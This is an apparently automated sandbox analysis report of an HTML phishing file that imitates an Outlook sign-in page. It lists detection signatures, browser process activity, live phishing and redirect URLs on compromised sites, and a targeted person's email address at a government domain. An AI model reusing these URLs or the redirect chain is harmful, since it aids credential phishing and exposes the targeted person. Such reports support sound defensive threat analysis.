Play interactive tour

Edit tour

Analysis Report 5781525.html

Overview

General Information

Sample Name:	5781525.html
Analysis ID:	412711
MD5:	9bf051dc4c81afeaeff5030f34e53fd4
SHA1:	607b98c2ce9abd3a92d1734065a2a8844609e2c5
SHA256:	18914ce325d9f374223492b1f48c41db41a0e9c0c8461f42522c76bd8bfb4a68
Infos:
Most interesting Screenshot:

Detection

HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish44

Yara detected obfuscated html page

Phishing site detected (based on image similarity)

Phishing site detected (based on logo template match)

HTML body contains low number of good links

HTML title does not match URL

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

Classification

Startup

System is w10x64

chrome.exe (PID: 5388 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\5781525.html' MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 6276 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,177793998006335442,11202177534024855872,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1708 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
5781525.html	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
5781525.html	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 5781525.html

Avira: detected

Antivirus detection for URL or domain

Show sources

Source: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=

SlashNext: Label: Fake Login Page type: Phishing & Social Engineering

Multi AV Scanner detection for submitted file

Show sources

Source: 5781525.html

Virustotal: Detection: 16%

Perma Link

Phishing:

Phishing site detected (based on favicon image match)

Show sources

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Show sources

Source: Yara match

File source: 53636.pages.csv, type: HTML

Yara detected HtmlPhish44

Show sources

Source: Yara match

File source: 5781525.html, type: SAMPLE

Yara detected obfuscated html page

Show sources

Source: Yara match

File source: 5781525.html, type: SAMPLE

Phishing site detected (based on image similarity)

Show sources

Matcher: Found strong image similarity, brand: Microsoft image: 53636.img.2.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD

Phishing site detected (based on logo template match)

Show sources

Matcher: Template: microsoft matched

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Number of links: 0
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Number of links: 0

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Title: Sign in to Outlook does not match URL
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Title: Sign in to Outlook does not match URL

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Forgot my password
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Forgot my password

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Terms of use
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Privacy & cookies
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Terms of use
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: Invalid link: Privacy & cookies

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: No <meta name="author".. found
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: No <meta name="author".. found

Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: No <meta name="copyright".. found
Source: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYzODE1ZGQ3OGIxZWFkM2UxMWVkOWE0MWJiMDJjNzcxMzM4YzdmNDhhY2QyNjA4N2E3OGU2ZDQ3OGQyNg==&email=pheeke@esd.wa.gov	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: unknown

HTTPS traffic detected: 5.144.130.32:443 -> 192.168.2.3:49775 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 192.0.77.2 192.0.77.2
Source: Joe Sandbox View	IP Address: 192.0.77.2 192.0.77.2

Source: Joe Sandbox View	JA3 fingerprint: b32309a26951912be7dba376398abc3b
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: esd.rwbdg.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: esd.rwbdg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Referer: http://esd.rwbdg.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ad.*^ajaxpipe^ equals www.facebook.com (Facebook)
Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ad.*^ajaxpipe^>- equals www.facebook.com (Facebook)
Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: esd.rwbdg.com

Source: unknown

HTTP traffic detected: POST /wild/api.php HTTP/1.1Host: esd.rwbdg.comConnection: keep-aliveContent-Length: 64Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://esd.rwbdg.comReferer: http://esd.rwbdg.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Data Raw: 63 55 73 65 72 4e 61 76 53 3d 61 48 52 30 63 48 4d 36 4c 79 39 33 63 6d 6c 30 5a 58 4a 73 65 53 35 6a 59 53 38 6a 63 47 68 6c 5a 57 74 6c 51 47 56 7a 5a 43 35 33 59 53 35 6e 62 33 59 25 33 44 Data Ascii: cUserNavS=aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y%3D

Source: 5781525.html	String found in binary or memory: http://Esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=%22%20%2F%3E
Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Current Session.0.dr	String found in binary or memory: http://esd.rwbdg.com
Source: Current Session.0.dr	String found in binary or memory: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=
Source: Current Session.0.dr	String found in binary or memory: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=$
Source: History-journal.0.dr	String found in binary or memory: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=/
Source: History Provider Cache.0.dr	String found in binary or memory: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2
Source: History Provider Cache.0.dr	String found in binary or memory: http://esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=2:
Source: e222f00a6abb9a7f_0.0.dr	String found in binary or memory: http://rwbdg.com/u
Source: Reporting and NEL.1.dr	String found in binary or memory: https://a.nel.cloudflare.com/report?s=ppHr7A2wLF5kAcE6y%2BVpsyCo9aMygCPKYaC9CDSC%2BOjgJWlpB82XDV9HuT
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, manifest.json0.0.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://accounts.google.com
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, manifest.json0.0.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://apis.google.com
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://code.jquery.com
Source: e222f00a6abb9a7f_0.0.dr	String found in binary or memory: https://code.jquery.com/jquery-3.5.1.js
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://content-autofill.googleapis.com
Source: manifest.json0.0.dr	String found in binary or memory: https://content.googleapis.com
Source: Reporting and NEL.1.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, a272768a-2d2b-447d-9f4d-ad5da35b066d.tmp.1.dr, 08d7be13-d743-4068-aaec-c768e3510e7b.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://dns.google
Source: manifest.json0.0.dr	String found in binary or memory: https://feedback.googleusercontent.com
Source: 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: manifest.json0.0.dr	String found in binary or memory: https://fonts.googleapis.com;
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: manifest.json0.0.dr	String found in binary or memory: https://fonts.gstatic.com;
Source: 602f5f874f3385c7_0.0.dr	String found in binary or memory: https://google.com/
Source: manifest.json0.0.dr	String found in binary or memory: https://hangouts.google.com/
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://i0.wp.com
Source: 000003.log6.0.dr	String found in binary or memory: https://kristenbakercoach.com
Source: 91be9c6b8d3150fe_0.0.dr	String found in binary or memory: https://kristenbakercoach.com/
Source: Favicons-journal.0.dr	String found in binary or memory: https://kristenbakercoach.com/favicon.ico
Source: Current Session.0.dr, Favicons-journal.0.dr, History.0.dr	String found in binary or memory: https://kristenbakercoach.com/wp-admin/js/redir/?csrftoken=MTYyMDg0OTEzMWQzZjE1NGExMzM1YTYzODE1ZGQ3O
Source: Favicons-journal.0.dr, History.0.dr	String found in binary or memory: https://kristenbakercoach.com/wp-admin/js/redir/?referrer=pheeke
Source: Current Session.0.dr	String found in binary or memory: https://kristenbakercoach.com/wp-admin/js/redir/check.php
Source: History.0.dr	String found in binary or memory: https://kristenbakercoach.com/wp-admin/js/redir/check.php/
Source: Current Session.0.dr	String found in binary or memory: https://kristenbakercoach.com/wp-admin/js/redir/check.php4
Source: Current Session.0.dr	String found in binary or memory: https://kristenbakercoach.comh
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://ogs.google.com
Source: manifest.json1.0.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://play.google.com
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://r5---sn-n02xgoxufvg3-2gbs.gvt1.com
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://redirector.gvt1.com
Source: manifest.json1.0.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: messages.json41.0.dr	String found in binary or memory: https://support.google.com/chromecast/answer/2998456
Source: messages.json41.0.dr	String found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
Source: Current Session.0.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://writerly.ca
Source: History-journal.0.dr, Favicons-journal.0.dr	String found in binary or memory: https://writerly.ca/#pheeke
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr	String found in binary or memory: https://www.eaqarat-iran.ir
Source: Network Action Predictor-journal.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/
Source: Current Session.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.gov
Source: History.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/?email=pheeke%40esd.wa.govSign
Source: History.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/checkemail?email=pheeke
Source: History.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/index?email=pheeke
Source: Favicons.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico
Source: Favicons.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/lib/img/favicon.ico-
Source: History.0.dr	String found in binary or memory: https://www.eaqarat-iran.ir/wp-admin/js/eng/app/nextlogin?csrftoken=MTYyMDg0OTE0NWQzZjE1NGExMzM1YTYz
Source: 000003.log6.0.dr	String found in binary or memory: https://www.google.com
Source: Current Session.0.dr	String found in binary or memory: https://www.google.com%
Source: QuotaManager.0.dr, 000003.log0.0.dr	String found in binary or memory: https://www.google.com/
Source: QuotaManager.0.dr	String found in binary or memory: https://www.google.com//
Source: Current Session.0.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ldr7MUaAAAAAMaYQTNpSsqRobZNq7kDdyq0WezE&co=aHR0
Source: manifest.json0.0.dr	String found in binary or memory: https://www.google.com;
Source: Current Session.0.dr	String found in binary or memory: https://www.google.comh
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: manifest.json0.0.dr	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp.1.dr, 34d8e2ae-acb6-4142-b400-5ae0a041f5ff.tmp.1.dr, 7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp.1.dr	String found in binary or memory: https://www.gstatic.com
Source: 91be9c6b8d3150fe_0.0.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/npGaewopg1UaB8CNtYfx-y1j/recaptcha__en.js
Source: manifest.json0.0.dr	String found in binary or memory: https://www.gstatic.com;

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown

HTTPS traffic detected: 5.144.130.32:443 -> 192.168.2.3:49775 version: TLS 1.2

Source: classification engine

Classification label: mal100.phis.winHTML@46/250@8/9

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-609CB072-150C.pma

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\b3562bd3-ce72-4819-8cc6-eb3135f46536.tmp

Jump to behavior

Source: QuotaManager.0.dr

Binary or memory string: CREATE TABLE HostQuotaTable(host TEXT NOT NULL, type INTEGER NOT NULL, quota INTEGER DEFAULT 0, UNIQUE(host, type));

Source: 5781525.html

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\5781525.html'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,177793998006335442,11202177534024855872,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1708 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,177793998006335442,11202177534024855872,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1708 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
